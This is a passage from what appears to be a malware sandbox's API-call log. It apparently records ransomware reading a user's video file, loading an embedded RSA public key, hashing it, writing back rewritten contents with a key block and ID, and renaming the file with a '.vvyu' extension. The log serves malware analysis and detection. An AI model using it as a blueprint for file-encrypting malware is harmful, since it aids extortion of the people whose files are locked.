lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.130] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.130] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xcef, lpOverlapped=0x0) returned 1 [0192.130] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0192.130] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.130] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.130] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0192.131] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0192.131] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.131] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0192.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0192.131] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0192.131] GetLastError () returned 0x0 [0192.132] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0192.132] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0192.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.132] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0192.132] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0192.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.132] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0192.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0192.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xcf0) returned 0x2ae8ea0 [0192.132] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0192.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0192.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0192.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0192.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3a98 [0192.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60e0 [0192.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3ae0 [0192.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae60f8 [0192.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6128 [0192.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6188 [0192.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6140 [0192.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0192.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0192.133] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0192.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0192.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6128 | out: hHeap=0x2c0000) returned 1 [0192.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6140 | out: hHeap=0x2c0000) returned 1 [0192.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6188 | out: hHeap=0x2c0000) returned 1 [0192.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0192.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6188 [0192.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0192.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6140 [0192.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0192.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6128 [0192.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0192.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0192.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0192.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0192.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0192.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0192.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0192.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0192.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6140 | out: hHeap=0x2c0000) returned 1 [0192.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6128 | out: hHeap=0x2c0000) returned 1 [0192.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6188 | out: hHeap=0x2c0000) returned 1 [0192.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0192.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0192.136] GetCurrentThreadId () returned 0x5d8 [0192.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0192.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7068 [0192.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0192.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0192.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0192.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.136] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0192.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0192.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.137] GetCurrentThreadId () returned 0x5d8 [0192.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0192.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0192.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0192.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0192.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0192.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0192.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0192.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6188 [0192.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0192.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0192.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0192.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0192.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0192.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0192.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6128 [0192.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0192.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0192.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0192.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0192.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0192.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6140 [0192.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0192.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0192.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0192.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6110 [0192.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0192.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61a0 [0192.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0192.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6170 [0192.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6158 [0192.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae61b8 [0192.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6158 | out: hHeap=0x2c0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6158 [0192.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6170 | out: hHeap=0x2c0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0192.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0192.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0192.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6128 | out: hHeap=0x2c0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6128 [0192.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0192.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6188 | out: hHeap=0x2c0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0192.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61b8 | out: hHeap=0x2c0000) returned 1 [0192.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0192.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0192.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0192.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0192.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0192.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6128 | out: hHeap=0x2c0000) returned 1 [0192.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0192.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0192.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0192.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0192.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0192.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0192.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0192.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0192.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0192.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0192.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0192.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0192.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0192.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6158 | out: hHeap=0x2c0000) returned 1 [0192.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0192.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae61a0 | out: hHeap=0x2c0000) returned 1 [0192.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0192.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6140 | out: hHeap=0x2c0000) returned 1 [0192.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6110 | out: hHeap=0x2c0000) returned 1 [0192.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0192.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0192.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0192.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae60f8 | out: hHeap=0x2c0000) returned 1 [0192.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3ae0 | out: hHeap=0x2c0000) returned 1 [0192.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0192.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0192.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0192.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0192.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0192.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0192.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0192.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0192.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0192.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0192.147] WriteFile (in: hFile=0x584, lpBuffer=0x2ae8ea0*, nNumberOfBytesToWrite=0xcea, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae8ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0xcea, lpOverlapped=0x0) returned 1 [0192.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8ea0 | out: hHeap=0x2c0000) returned 1 [0192.149] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xcef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.149] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0192.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0192.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0192.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0192.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0192.150] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0192.150] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.150] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.150] CloseHandle (hObject=0x584) returned 1 [0192.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0192.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0192.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0192.152] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\x7DOA nu7EAlTL.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\x7doa nu7ealtl.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\x7DOA nu7EAlTL.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\x7doa nu7ealtl.mkv.vvyu")) returned 1 [0192.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0192.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0192.154] VirtualFree 